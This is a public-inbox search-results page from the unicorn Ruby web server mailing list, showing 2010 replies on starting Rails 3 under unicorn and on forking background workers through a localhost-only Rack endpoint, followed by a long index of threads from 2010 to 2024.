>> I, [2010-05-28T08:54:45.771200 #17852]  INFO -- : worker=0 spawning...
>> I, [2010-05-28T08:54:45.774049 #17858]  INFO -- : worker=0 spawned pid=17858
>> I, [2010-05-28T08:54:45.774350 #17858]  INFO -- : Refreshing Gem list
>>
>> /usr/local/lib/ruby/gems/1.9.1/gems/activesupport-3.0.0.beta3/lib/active_support/deprecation/proxy_wrappers.rb:17:in
>> `new': wrong number of arguments (1 for 2) (ArgumentError)
>> 	from
>> /usr/local/lib/ruby/gems/1.9.1/gems/activesupport-3.0.0.beta3/lib/active_support/deprecation/proxy_wrappers.rb:17:in
>> `method_missing'
> 
> <snip>
> 
>> Any ideas what's wrong?
> 
> Hi Stefan,
> 
> I've heard (but not confirmed myself) Rails 3 doesn't work well with
> Ruby 1.9.1, but does with 1.9.2dev (trunk), and 1.8.7.  Can you give
> either of those versions of Ruby a try?
> 
> Another thing that's probably not the issue here, but since config.ru is
> present, give "unicorn" a shot instead of "unicorn_rails" as the latter
> hasn't been tested heavily with Rails 3.  "unicorn_rails" was designed
> with older Rails in mind.
> 
> Let us know what you find, thanks!
> 

Hi Eric,
Using the config.ru with "unicorn" does indeed work.
If I have the time I'll investigate other ruby versions tomorrow.

Thanks,
Stefan Maier


* Re: unicorn failing to start
  @ 2010-05-28 18:49  4% ` Eric Wong
  2010-05-28 19:19  0%   ` Stefan Maier
  0 siblings, 1 reply; 200+ results
From: Eric Wong @ 2010-05-28 18:49 UTC (permalink / raw)
  To: unicorn list; +Cc: Stefan Maier

Stefan Maier <stefanmaier@gmail.com> wrote:
> Hi,
> 
> i'm trying to start up unicorn_rails with a rails 3 beta3 project. All I
> can get out of it is this:
> I, [2010-05-28T08:54:45.770957 #17852]  INFO -- : reaped
> #<Process::Status: pid 17854 exit 1> worker=0
> I, [2010-05-28T08:54:45.771200 #17852]  INFO -- : worker=0 spawning...
> I, [2010-05-28T08:54:45.774049 #17858]  INFO -- : worker=0 spawned pid=17858
> I, [2010-05-28T08:54:45.774350 #17858]  INFO -- : Refreshing Gem list
> 
> /usr/local/lib/ruby/gems/1.9.1/gems/activesupport-3.0.0.beta3/lib/active_support/deprecation/proxy_wrappers.rb:17:in
> `new': wrong number of arguments (1 for 2) (ArgumentError)
> 	from
> /usr/local/lib/ruby/gems/1.9.1/gems/activesupport-3.0.0.beta3/lib/active_support/deprecation/proxy_wrappers.rb:17:in
> `method_missing'

<snip>

> Any ideas what's wrong?

Hi Stefan,

I've heard (but not confirmed myself) Rails 3 doesn't work well with
Ruby 1.9.1, but does with 1.9.2dev (trunk), and 1.8.7.  Can you give
either of those versions of Ruby a try?

Another thing that's probably not the issue here, but since config.ru is
present, give "unicorn" a shot instead of "unicorn_rails" as the latter
hasn't been tested heavily with Rails 3.  "unicorn_rails" was designed
with older Rails in mind.

Let us know what you find, thanks!

-- 
Eric Wong

* Re: Forking off the unicorn master process to create a background worker
  @ 2010-05-26 21:05  0% ` Eric Wong
  2010-06-15 17:55  0%   ` Russell Branca
  0 siblings, 1 reply; 200+ results
From: Eric Wong @ 2010-05-26 21:05 UTC (permalink / raw)
  To: unicorn list; +Cc: Russell Branca

Russell Branca <chewbranca@gmail.com> wrote:
> Hello,
> 
> I'm trying to find an efficient way to create a new instance of a
> rails application to perform some background tasks without having to
> load up the entire rails stack every time, so I figured forking off
> the master process would be a good way to go. Now I can easily just
> increment the worker count and then send a web request in, but the new
> worker would be part of the main worker pool, so in the time between
> spawning a new worker and sending the request, another request could
> have come in and snagged that worker. Is it possible to create a new
> worker and not have it enter the main worker pool so I could access it
> directly?

Hi Russell,

You could try having an endpoint in your webapp (with authentication, or
have it reject env['REMOTE_ADDR'] != '127.0.0.1') that runs the
background task for you.  Since it's a background app, you should
probably fork + Process.setsid + fork (or Process.daemon in 1.9), and
return an HTTP response immediately so your app can serve other
requests.

The following example should be enough to get you started (totally
untested)

------------ config.ru -------------
require 'rack/lobster'

map "/.seekrit_endpoint" do
  use Rack::ContentLength
  use Rack::ContentType, 'text/plain'
  run(lambda { |env|
    return [ 403, {}, [] ] if env['REMOTE_ADDR'] != '127.0.0.1'
    pid = fork
    if pid
      Process.waitpid(pid)

      # cheap way to avoid unintentional fd sharing with our children,
      # this causes the current Unicorn worker to exit after sending
      # the response:
      # Otherwise you'd have to be careful to disconnect+reconnect
      # databases/memcached/redis/whatever (in both the parent and
      # child) to avoid unintentional sharing that'll lead to headaches
      Process.kill(:QUIT, $$)

      [ 200, {}, [ "started background process\n" ] ]
    else
      # child, daemonize it so the unicorn master won't need to
      # reap it (that's the job of init)
      Process.setsid
      exit if fork

      begin
        # run your background code here instead of sleeping
        sleep 5
        env["rack.logger"].info "done sleeping"
      rescue => e
        env["rack.logger"].error(e.inspect)
      end
      # make sure we don't enter the normal response cycle back in the
      # worker...
      exit!(0)
    end
  })
end

map "/" do
  run Rack::Lobster.new
end

> I know this is not your typical use case for unicorn, and you're
> probably thinking there is a lot better ways to do this, however, I
> currently have a rails framework that powers a handful of standalone
> applications on a server with limited resources, and I'm trying to
> make a centralized queue that all the applications use, so the queue
> needs to be able to spawn a new worker for each of the applications
> efficiently, and incrementing/decrementing worker counts in unicorn is
> the most efficient way I've found to spawn a new rails instance.

Yeah, it's definitely an odd case and there are ways to shoot yourself
in the foot with it (especially with unintentional fd sharing), but Ruby
exposes all the Unix process management goodies better than most
languages (probably better than anything else I've used).

> Any help, suggestions or insight into this would be greatly appreciated.

Let us know how it goes :)

-- 
Eric Wong

2010-05-25 18:53     Forking off the unicorn master process to create a background worker Russell Branca
2010-05-26 21:05  0% ` Eric Wong
2010-06-15 17:55  0%   ` Russell Branca
2010-06-15 22:14         ` Eric Wong
2010-06-15 22:51           ` Russell Branca
2010-06-16  0:06  4%         ` Eric Wong
2010-05-28  8:55     unicorn failing to start Stefan Maier
2010-05-28 18:49  4% ` Eric Wong
2010-05-28 19:19  0%   ` Stefan Maier
2010-06-14 19:46     Unicorn future plans Eric Wong
2010-06-14 20:58  3% ` John-Paul Bader
2010-06-14 22:10  0%   ` Eric Wong
     [not found]     <AANLkTilv4e_DPDKy440xotrlE7ucFIFXs74uHyGrzCKL@mail.gmail.com>
2010-06-22  0:16     ` [Mongrel] scaling unicorn Eric Wong
2010-06-22  2:34       ` Jamie Wilkinson
2010-06-22  4:53         ` Eric Wong
2010-06-22 18:03           ` snacktime
2010-06-22 18:57  4%         ` Jamie Wilkinson
2010-06-23  5:57     Purpose of "Status" header in HTTP responses? Craig Davey
2010-06-23  9:07  3% ` Eric Wong
2010-07-13 20:19     [ANN] unicorn 1.0.1 and 1.1.2 - fix rollbacks Eric Wong
2010-07-14  0:13     ` Lawrence Pit
2010-07-14  0:38       ` Eric Wong
2010-07-14  2:14         ` Lawrence Pit
2010-07-14  2:34           ` Eric Wong
2010-07-14  7:00             ` Lawrence Pit
2010-07-15 18:07               ` Jamie Wilkinson
2010-07-16  0:47  2%             ` Lawrence Pit
2010-08-17  1:29     running unicorn under rvm Joseph McDonald
2010-08-17  3:52     ` Eric Wong
2010-08-17 22:37  4%   ` Joseph McDonald
2010-08-18  1:08  0%     ` Eric Wong
2010-08-17 23:38     javascript disappears Jimmy Soho
2010-08-18  1:14     ` Eric Wong
2010-08-18  2:23       ` Jimmy Soho
2010-08-18  2:45         ` Eric Wong
2010-08-18  3:39  3%       ` Jimmy Soho
2010-10-22 19:50     502 bad gateway on nginx with recv() failed Naresh V
2010-10-22 21:14     ` Eric Wong
2010-10-23  4:48       ` Naresh V
2010-10-23 23:22         ` Eric Wong
2010-10-24  6:00  5%       ` Naresh V
2010-12-01 11:59     Unicorn and HAProxy, 500 Internal errors after checks Pierre
2010-12-01 16:52     ` Eric Wong
2010-12-01 17:14       ` Pierre
2010-12-01 19:58  4%     ` Eric Wong
2010-12-03  1:35     listen backlog ghazel
2010-12-03  2:39     ` Eric Wong
2010-12-03  5:31       ` ghazel
2010-12-03  7:35         ` Eric Wong
2010-12-03  9:16           ` ghazel
2010-12-03 21:49  4%         ` Eric Wong
2010-12-03 22:49  0%           ` ghazel
2010-12-04 23:48  0%             ` Eric Wong
2010-12-05  0:02  0%               ` ghazel
2011-01-06  7:20  3% [PATCH] close client socket after closing response body Eric Wong
2011-01-07  0:16  0% ` [ANN] unicorn 3.3.1 and 1.1.6 - one minor, esoteric bugfix Eric Wong
2011-03-22 19:19     unicorn 1.1.x never-ending listen loop IOError exceptions David Nghiem
2011-03-22 21:39     ` Eric Wong
2011-03-23  0:04       ` David Nghiem
2011-03-23  1:09  4%     ` Eric Wong
     [not found]     <BANLkTikFid3n0QpsrnXf2oNansFmuJDyuw@mail.gmail.com>
     [not found]     ` <BANLkTimF78PW9YgEAURS604Q8mucNwSDrg@mail.gmail.com>
2011-05-31 12:02       ` unicorn stuck in sched_yield after ERESTARTNOHAND Bharanee Rathna
2011-05-31 23:48         ` Eric Wong
2011-06-01  0:31  4%       ` Bharanee Rathna
2011-06-01  0:44  0%         ` Bharanee Rathna
2011-06-07  2:28  9% [PATCH] examples/nginx.conf: add ipv6only comment Eric Wong
2011-06-07 17:04 10% ` Eric Wong
2011-06-21  0:06     problem setting multiple cookies Eric Wong
2011-06-21  0:25     ` Jason Su
2011-06-21  0:46       ` Eric Wong
2011-06-21  1:34         ` Jason Su
2011-06-21  2:15           ` Eric Wong
2011-06-21  2:48             ` Jason Su
2011-06-21  3:15               ` Eric Wong
2011-06-21  3:38                 ` Jason Su
2011-06-21 18:29                   ` Eric Wong
2011-06-22  1:01                     ` Jason Su
2011-06-22  1:59  4%                   ` Eric Wong
2011-06-25 16:08     Unicorn and streaming in Rails 3.1 Xavier Noria
2011-06-25 20:16  5% ` Eric Wong
2011-06-25 22:23  0%   ` Xavier Noria
2011-06-25 20:33  4% ` Eric Wong
2011-07-06 10:21  4% Unicorn completely ignores USR2 signal Ehud Rosenberg
2011-07-06 17:42  0% ` Eric Wong
2011-07-07 23:02  0%   ` Ehud Rosenberg
2011-07-25 20:21     SIGTERM not actually killing processes Jesse Cooke
2011-07-25 21:22     ` Eric Wong
     [not found]       ` <DA420539FB904E888DB3B397DC431B7C@gmail.com>
     [not found]         ` <CAFgS5CxwCmHL65W39R2W73YfUK34WX50DS_JJF4L-d_tQuH86Q@mail.gmail.com>
2011-07-25 23:20  0%       ` Jesse Cooke
2011-08-02 20:09     Strange quit behavior James Cox
2011-08-02 21:53     ` Eric Wong
2011-08-02 22:46       ` James Cox
2011-08-02 23:08         ` Eric Wong
2011-08-02 23:49  4%       ` Alex Sharp
2011-08-05  4:09     Alex Sharp
2011-08-05  4:12     ` Alex Sharp
2011-08-05  8:07       ` Eric Wong
2011-08-17  4:26         ` Alex Sharp
2011-08-17  9:22           ` Eric Wong
2011-08-17 20:13             ` Eric Wong
2011-08-18 23:13               ` Alex Sharp
2011-08-19  1:53                 ` Eric Wong
2011-08-19  9:42                   ` Alex Sharp
2011-08-23  2:59                     ` Alex Sharp
2011-08-23  7:12                       ` Eric Wong
2011-08-23 16:49  4%                     ` Alex Sharp
2011-08-12  4:39     Rack content-length Rack::Lint::LintErrors errors with unicorn Joe Van Dyk
2011-08-12  5:42     ` Eric Wong
2011-08-12 18:09       ` Joe Van Dyk
2011-08-12 19:22  3%     ` Joe Van Dyk
2011-09-08  9:04  1% Sending ABRT to timeout-errant process before KILL J. Austin Hughey
2011-09-08 19:13  5% ` Eric Wong
2011-11-10 10:01     help with an init script Xavier Noria
2011-11-10 11:20  4% ` Eric Wong
2011-11-14 21:56  4% nginx + unicorn deployment survey Eric Wong
2011-11-15  2:00  0% ` Jason Su
2011-11-15  5:07  0% ` Christopher Bailey
2011-11-15 17:47  0% ` Alex Sharp
2011-11-21 23:14  4% Should USR2 always work? Laurens Pit
2011-11-22  1:16  0% ` Eric Wong
2012-02-29 14:34 14% [PATCH] Start the server if another user has a PID matching our stale pidfile Graham Bleach
2012-02-29 17:25 10% ` Eric Wong
2012-03-20 20:10  9%   ` Eric Wong
2012-03-09 21:48     Unicorn_rails ignores USR2 signal Yeung, Jeffrey
2012-03-09 22:24     ` Eric Wong
2012-03-09 22:39       ` Yeung, Jeffrey
2012-03-10  0:02         ` Eric Wong
2012-03-10  1:07           ` Yeung, Jeffrey
2012-03-10  1:30  5%         ` Eric Wong
2012-03-12 21:21  0%           ` Eric Wong
2012-03-12 22:39  0%             ` Yeung, Jeffrey
2012-03-12 22:44                   ` Eric Wong
2012-03-20 19:57                     ` Eric Wong
2012-03-20 23:09  3%                   ` Yeung, Jeffrey
2012-03-21  2:27  0%                     ` Devin Ben-Hur
2012-03-22  6:30  4% unicorn 4.2.1 release soon? Eric Wong
2012-03-26 21:45  4% [ANN] unicorn 4.2.1 - minor fix and doc updates Eric Wong
2012-04-12 17:36     Background jobs with #fork paddor
2012-04-12 20:39     ` Eric Wong
2012-04-12 22:41  6%   ` Patrik Wenger
2012-04-12 23:04  0%     ` Eric Wong
2012-04-27 14:36     app error: Socket is not connected (Errno::ENOTCONN) Joel Nimety
2012-04-27 18:59     ` Eric Wong
     [not found]       ` <CACsAZRR=NP4O+EB0koAr0aeUwth=M+5aQnA8vtVLEXqFHd=jnA@mail.gmail.com>
2012-04-27 19:51  0%     ` Eric Wong
2012-04-27 19:53  0%       ` Eric Wong
2012-04-27 20:30  0%       ` Matt Smith
2012-06-25 13:02     Address already in use Manuel Palenciano Guerrero
2012-06-25 20:28     ` Eric Wong
2012-06-25 21:03       ` Manuel Palenciano Guerrero
2012-06-25 23:57  4%     ` Eric Wong
     [not found]     <mailman.0.1345509654.31187.mongrel-unicorn@rubyforge.org>
2012-08-21  0:44     ` Unused Unicorn processes Konstantin Gredeskoul
2012-08-21  9:11  4%   ` Eric Wong
2012-08-22 18:16  0%     ` Konstantin Gredeskoul
2012-10-09  0:39  3% Is a client uploading a file a slow client from unicorn's point of view? Jimmy Soho
2012-10-09  1:58  0% ` Eric Wong
2012-10-18  6:33  4% Rack env rack.multiprocess true with single worker Petteri Räty
2012-10-18  7:53  0% ` Eric Wong
2012-10-29 17:44     Combating nginx 499 HTTP responses during flash traffic scenario Tom Burns
2012-10-29 18:45     ` Eric Wong
2012-10-29 21:53       ` Eric Wong
2012-10-29 22:21  4%     ` Tom Burns
2012-11-19 10:17     Number of worker processes on hyperthreaded processor Andrew Stewart
2012-11-19 11:23  4% ` Eric Wong
2013-01-19 22:57  0%   ` Jérémy Lecour
2012-11-25 23:27     pid file deleted briefly when doing hot restart Petteri Räty
2012-11-26  0:43  4% ` Eric Wong
     [not found]     <CA+c-+BYTxv+5mQ2MKeKVYEoxgPbi2QjwY6Oak-R_g65GhixEzg@mail.gmail.com>
2012-12-05  5:19     ` Fwd: Issue starting unicorn with non-ActiveRecord Rails app Peter Hall
2012-12-05  7:45  4%   ` Eric Wong
2013-01-20  7:36     preload_app = true causing - ActiveModel::MissingAttributeError: missing attribute: some_attr Avner Cohen
2013-01-20  8:04     ` Eric Wong
2013-01-20  8:10       ` Avner Cohen
2013-01-20  9:17         ` Eric Wong
2013-01-21  7:55  4%       ` Avner Cohen
2013-01-25 10:52  2% No middleware without touching RACK_ENV Lin Jen-Shin (godfat)
2013-01-25 18:39  0% ` Eric Wong
2013-01-29  3:21  3% [PATCH] Add -N or --no-default-middleware option Lin Jen-Shin
2013-05-08 23:01  9% [PATCH] HttpParser#next? becomes response_start_sent-aware Eric Wong
2013-05-15  8:52  4% Growing memory use of master process Andrew Stewart
2013-05-15  9:28  0% ` Eric Wong
2013-05-28 11:17  4% Unicorn freezes, requests got stuck in the queue most likely Alexander Dymo
2013-05-28 17:20  0% ` Eric Wong
2013-06-13 16:09     HEAD responses contain body Jonathan Rudenberg
2013-06-13 18:22     ` Eric Wong
2013-06-13 18:42       ` Jonathan Rudenberg
2013-06-13 19:21  4%     ` Eric Wong
2013-06-13 19:28  0%       ` Jonathan Rudenberg
2013-06-13 19:34  0%         ` Jonathan Rudenberg
2013-08-20 14:47     A barrage of unexplained timeouts nick
2013-08-20 16:37     ` Eric Wong
2013-08-20 17:27       ` nick
2013-08-20 17:40         ` Eric Wong
2013-08-20 18:11           ` nick
2013-08-20 18:49             ` Eric Wong
2013-08-20 20:03               ` nick
2013-08-20 20:42                 ` Eric Wong
2013-08-20 21:19                   ` nick
2013-08-20 21:32  4%                 ` Eric Wong
2013-08-21 13:33  0%                   ` nick
2013-09-24 16:02     IOError: closed stream David Judd
2013-09-24 17:39  3% ` Eric Wong
2013-09-29 20:13     More unexplained timeouts nick
2013-09-30  0:06  4% ` Eric Wong
2013-10-23 22:55  4% pid file handling issue Michael Fischer
2013-10-24  0:53  0% ` Eric Wong
2013-10-24  1:01  4%   ` Michael Fischer
2013-10-24  2:03  0%     ` Eric Wong
2013-10-24 17:51  0%       ` Michael Fischer
2013-10-24 18:21  0%         ` Eric Wong
2013-10-24 11:08     Forking non web processes Sam Saffron
2013-10-24 16:17     ` Eric Wong
2013-10-24 16:25  6%   ` Alex Sharp
2013-11-05 14:46     Handling closed clients Andrew Hobson
2013-11-05 17:20     ` Eric Wong
     [not found]       ` <m2iow6k7nk.fsf@macdaddy.atl.damballa>
2013-11-05 20:51  7%     ` Eric Wong
     [not found]           ` <m21u2sjpc9.fsf@macdaddy.atl.damballa>
2013-11-07 16:48  0%         ` Eric Wong
2013-11-07 20:22  0%           ` [PATCH] stream_input: avoid IO#close on client disconnect Eric Wong
2013-11-26  1:00  3% Issues with PID file renaming Jimmy Soho
2013-11-26  1:20  0% ` Eric Wong
2013-12-09  9:52     [PATCH] rework master-to-worker signaling to use a pipe Eric Wong
2013-12-10  0:22     ` Sam Saffron
2013-12-10  1:58  4%   ` Eric Wong
2014-01-27 16:56  5% listen loop error in 4.8.0 Eric Wong
2014-05-02 23:15  4% [RFC/PATCH] http_server: handle premature grandparent death Eric Wong
2014-05-07  8:05     [ANN] unicorn 4.8.3 - the end of an era Eric Wong
2014-05-07  9:30     ` Jérémy Lecour
2014-05-07  9:46       ` Eric Wong
2014-05-07 20:33  6%     ` Michael Fischer
2014-05-07 21:25  0%       ` Eric Wong
2014-05-07 12:08  5% ` Bráulio Bhavamitra
2014-06-05 17:39     Dealing with big uploads and/or slow clients Bráulio Bhavamitra
2014-06-06  1:27     ` Eric Wong
2014-06-06  2:51       ` Sam Saffron
2014-06-06  5:59  5%     ` Eric Wong
2014-08-02  7:51     Please move to github Gary Grossman
2014-08-02  8:50  3% ` Eric Wong
2014-08-02 19:07  0%   ` Gary Grossman
2014-08-02 19:33         ` Michael Fischer
2014-08-04  7:22           ` Hongli Lai
2014-08-04  8:48  6%         ` Rack encodings (was: Please move to github) Eric Wong
2014-08-04  9:46  0%           ` Hongli Lai
2014-08-05  5:56  4% Gary Grossman
2014-08-05  6:28  0% ` Eric Wong
2014-10-03 11:34     Master hooks needed Bráulio Bhavamitra
2014-10-03 12:22  4% ` Eric Wong
2014-10-03 12:36  0%   ` Valentin Mihov
2014-10-04  0:53  0%   ` Bráulio Bhavamitra
2014-10-09 12:24  4% Reserved workers not as webservers Bráulio Bhavamitra
2014-10-24 19:13     Having issue with Unicorn Eric Wong
2014-10-24 19:29     ` Imdad
2014-10-24 19:41       ` Eric Wong
2014-10-24 19:58         ` Imdad
2014-10-24 20:06           ` Eric Wong
2014-10-24 20:09             ` Imdad
2014-10-24 20:17               ` Eric Wong
2014-10-24 20:35                 ` Imdad
2014-10-24 20:40                   ` Eric Wong
2014-10-24 20:45                     ` Imdad
2014-10-24 20:58  5%                   ` Eric Wong
2014-10-24 21:24  0%                     ` Imdad
2014-11-12 19:46     Issue with Unicorn: Big latency when getting a request Roberto Cordoba del Moral
2014-11-13  7:12     ` Roberto Cordoba del Moral
2014-11-13 21:03       ` Eric Wong
2014-11-14  6:46         ` Roberto Cordoba del Moral
2014-11-14  7:19           ` Eric Wong
2014-11-14  9:09             ` Roberto Cordoba del Moral
2014-11-14  9:32               ` Roberto Cordoba del Moral
2014-11-14 10:02                 ` Eric Wong
2014-11-14 10:12                   ` Roberto Cordoba del Moral
2014-11-14 10:15                     ` Roberto Cordoba del Moral
2014-11-14 10:28  5%                   ` Eric Wong
2014-11-14 10:51  0%                     ` Roberto Cordoba del Moral
2014-11-16  8:32     [RFC] http: TypedData C-API conversion Eric Wong
2014-12-28  7:06     ` Eric Wong
2014-12-28  7:17  4%   ` [PATCH] tmpio: drop the "size" method Eric Wong
2014-12-30 16:38     Unicorn workers timing out intermittently Aaron Price
2014-12-30 18:12  0% ` Eric Wong
2014-12-30 20:02  0%   ` Aaron Price
2015-01-22  5:12  4% [RFC] remove old inetd+git examples and exec_cgi Eric Wong
2015-01-29 13:06     Timeouts longer than expected Antony Gelberg
2015-01-29 20:00  5% ` Eric Wong
2015-02-16  2:19     Bug, Unicorn can drop signals in extreme conditions Steven Stewart-Gallus
2015-02-18  9:15  3% ` Eric Wong
2015-03-03 22:24     Request Queueing after deploy + USR2 restart Sarkis Varozian
2015-03-03 22:32     ` Michael Fischer
2015-03-04 19:48       ` Sarkis Varozian
2015-03-04 19:51         ` Michael Fischer
2015-03-04 19:58           ` Sarkis Varozian
2015-03-04 20:17             ` Michael Fischer
2015-03-04 20:24  4%           ` Sarkis Varozian
2015-03-04 20:27  0%             ` Michael Fischer
2015-03-04 20:35  0%             ` Eric Wong
2015-03-04 20:40  0%               ` Sarkis Varozian
2015-03-05 17:07  0%                 ` Sarkis Varozian
2015-03-05 17:13  0%                   ` Bráulio Bhavamitra
2015-03-05 17:28  0%                     ` Sarkis Varozian
2015-03-05 17:31  0%                       ` Bráulio Bhavamitra
2015-03-05 17:32  0%                       ` Bráulio Bhavamitra
2015-03-12  1:04     On USR2, new master runs with same PID Kevin Yank
2015-03-12  1:45  4% ` Eric Wong
2015-03-12  6:26  0%   ` Kevin Yank
2015-03-24 22:43     nginx reverse proxy getting ECONNRESET Michael Fischer
2015-03-24 22:54     ` Eric Wong
2015-03-24 22:59  5%   ` Eric Wong
2015-03-24 23:04  0%     ` Michael Fischer
2015-03-24 23:23  0%       ` Eric Wong
2015-04-07 23:22  4% possible errors reading mailing list archives Eric Wong
2015-06-15 22:56     [ANN] unicorn 5.0.0.pre1 - incompatible changes! Eric Wong
2015-07-06 21:41  9% ` [ANN] unicorn 5.0.0.pre2 - another prerelease! Eric Wong
2015-06-26 22:18  4% Does the the environment is preserved on USR2? Bráulio Bhavamitra
2015-07-05  0:31  4% [PATCH] test/unit/test_response.rb: compatibility with older test-unit Eric Wong
2015-07-15 22:05  2% [PATCH] doc: remove references to old servers Eric Wong
2015-10-14 20:12  4% unicorn non-technical FAQ Eric Wong
2015-11-16 23:43     undefined method `include?' for nil:NilClass (NoMethodError) Owen Ou
2015-11-17  0:27  3% ` Eric Wong
     [not found]     <CAOxZbrXuC-MTZjkQOREorkv8k4Cu9X3M5f_R1p8LYO+QyJhBug@mail.gmail.com>
2016-05-26 21:57  3% ` Unicorn is a famous and widely use software, but why official website look so outdate? Eric Wong
2016-12-12  2:10     WTF is up with memory usage nowadays? Eric Wong
2017-02-08 20:00  4% ` Eric Wong
2017-02-22 12:02     check_client_connection using getsockopt(2) Simon Eskildsen
2017-02-22 18:33  4% ` Eric Wong
2017-02-22 20:09  3%   ` Simon Eskildsen
2017-02-23  1:42  4%     ` Eric Wong
2017-02-23  2:42  0%       ` Simon Eskildsen
2017-02-23  3:52  5%         ` Eric Wong
2017-02-25 14:03  4% [PATCH] check_client_connection: use tcp state on linux Simon Eskildsen
2017-02-25 16:19  0% ` Simon Eskildsen
2017-02-25 23:12  0%   ` Eric Wong
2017-02-27 11:44         ` Simon Eskildsen
2017-02-28 21:12           ` Eric Wong
2017-03-01  3:18             ` Eric Wong
2017-03-06 21:32  2%           ` Simon Eskildsen
2017-03-07 22:50  0%             ` Eric Wong
2017-07-13 18:48     Random crash when sending USR2 + QUIT signals to Unicorn process Pere Joan Martorell
2017-07-13 19:34  5% ` Eric Wong
2017-07-14 10:21  0%   ` Pere Joan Martorell
2017-08-04 16:40  4% initialize/fork crash in macOS 10.13 Jeffrey Carl Faden
2017-09-14  8:25     Bug, probably related to Unicoen Felix Yasnopolski
2017-09-14  9:15     ` Eric Wong
2017-09-27  7:05  5%   ` Eric Wong
2017-12-23 23:42  4% [ANN] unicorn 5.4.0 - Rack HTTP server for fast clients and Unix Eric Wong
2018-01-14 23:27     Log URL with murder_lazy_workers Sam Saffron
2018-01-15  1:57     ` Eric Wong
2018-01-15  2:18       ` Sam Saffron
     [not found]         ` <CADGZSScpXo7-PvM=Ki64hhPSzWAsjyT+fWKAZ9-30U69x+54iA@mail.gmail.com>
2018-01-15  3:22  4%       ` Sam Saffron
2019-03-06  1:47  5% Issues after 5.5.0 upgrade Stan Pitucha
2019-03-06  2:48     ` Eric Wong
2019-03-06  4:07  4%   ` Stan Pitucha
2019-03-06  4:44  0%     ` Eric Wong
2019-03-06  5:57  0%       ` Jeremy Evans
2019-05-12 22:25     [PATCH 0/3] slow clients and test/benchmark tools Eric Wong
2019-05-12 22:25  7% ` [PATCH 1/3] test/benchmark/ddstream: demo for slowly reading clients Eric Wong
2019-05-26  5:24 10% yet-another-horribly-named-server as an nginx alternative Eric Wong
2019-12-16 22:34  4% Traffic priority with Unicorn Bertrand Paquet
2019-12-17  5:12  0% ` Eric Wong
2019-12-18 22:06  0%   ` Bertrand Paquet
2020-04-15  5:06  4% Sustained queuing on one listener can block requests from other listeners Stan Hu
2020-04-15  5:26  0% ` Eric Wong
2020-04-16  5:46  0%   ` Stan Hu
2020-09-01 12:17     [PATCH] Update ruby_version requirement to allow ruby 3.0 Jean Boussier
2020-09-01 14:48     ` Eric Wong
2020-09-01 15:04       ` Jean Boussier
2020-09-01 15:41         ` Eric Wong
2020-09-03  7:52  4%       ` Jean Boussier
2020-09-03  8:25  0%         ` Eric Wong
2020-09-03  8:29  0%           ` Jean Boussier
2020-09-03  9:31  0%             ` Eric Wong
2020-09-03 11:23                   ` Jean Boussier
2020-09-04 12:34                     ` Jean Boussier
2020-09-06  9:30                       ` Eric Wong
2020-09-07  7:13                         ` Jean Boussier
2020-09-08  2:24                           ` Eric Wong
2020-09-08  8:00                             ` Jean Boussier
2020-09-08  8:50  6%                           ` Eric Wong
2020-11-26 11:59     [RFC] http_response: ignore invalid header response characters Eric Wong
2021-01-06 17:53     ` Eric Wong
2021-01-13 23:20  3%   ` Sam Sanoop
2021-01-14  4:37         ` Eric Wong
2021-01-28 17:29           ` Sam Sanoop
2021-01-28 22:39  5%         ` Eric Wong
2021-02-17 21:46  0%           ` Sam Sanoop
     [not found]     <F6712BF3-A4DD-41EE-8252-B9799B35E618@github.com>
     [not found]     ` <20210311030250.GA1266@dcvr>
     [not found]       ` <7F6FD017-7802-4871-88A3-1E03D26D967C@github.com>
2021-03-12  9:41         ` Potential Unicorn vulnerability Eric Wong
2021-03-12 11:14           ` Dirkjan Bussink
2021-03-12 12:00  4%         ` Eric Wong
2021-03-12 12:24  0%           ` Dirkjan Bussink
2022-07-05 20:05     [PATCH] Master promotion with SIGURG (CoW optimization) Jean Boussier
2022-07-06  2:33  3% ` Eric Wong
2022-07-06  7:40  2%   ` Jean Boussier
2022-07-07 10:23  3%     ` Eric Wong
     [not found]           ` <CANPRWbHTNiEcYq5qhN6Kio8Wg9a+2gXmc2bAcB2oVw4LZv8rcw@mail.gmail.com>
     [not found]             ` <CANPRWbGArasDtbAej4LsCOGeYZSrNz87p5kLjG+x__jHAn-5ng@mail.gmail.com>
2022-07-08  0:13  2%           ` Eric Wong
2022-07-08  0:30  0%         ` Eric Wong
2022-07-08  7:46     [PATCH] Make the gem usable as a git gem Jean Boussier
2022-07-08 12:12  4% ` Eric Wong
2023-03-01 23:12     [PATCH] epollexclusive: avoid Ruby object allocation for buffer Eric Wong
2023-03-22 12:53     ` Jean Boussier
2023-03-28 12:24  5%   ` [PATCH] epollexclusive: use maxevents=1 for epoll_wait Eric Wong
2023-06-05 10:32  1% [PATCH 00-23/23] start porting tests to Perl5 Eric Wong
2023-09-05  9:44  1% [RFC 0-3/3] depend on Ruby 2.5+, eliminate kgio Eric Wong
2024-03-23 19:45  1% [PATCH 0/4] a small pile of patches Eric Wong
2024-05-06 20:10  1% [PATCH 0/5..5/5] more tests to Perl 5 for stability Eric Wong

Code repositories for project(s) associated with this public inbox

	https://yhbt.net/unicorn.git/

This is a public inbox, see mirroring instructions
for how to clone and mirror all data and code used for this inbox;
as well as URLs for read-only IMAP folder(s) and NNTP newsgroup(s).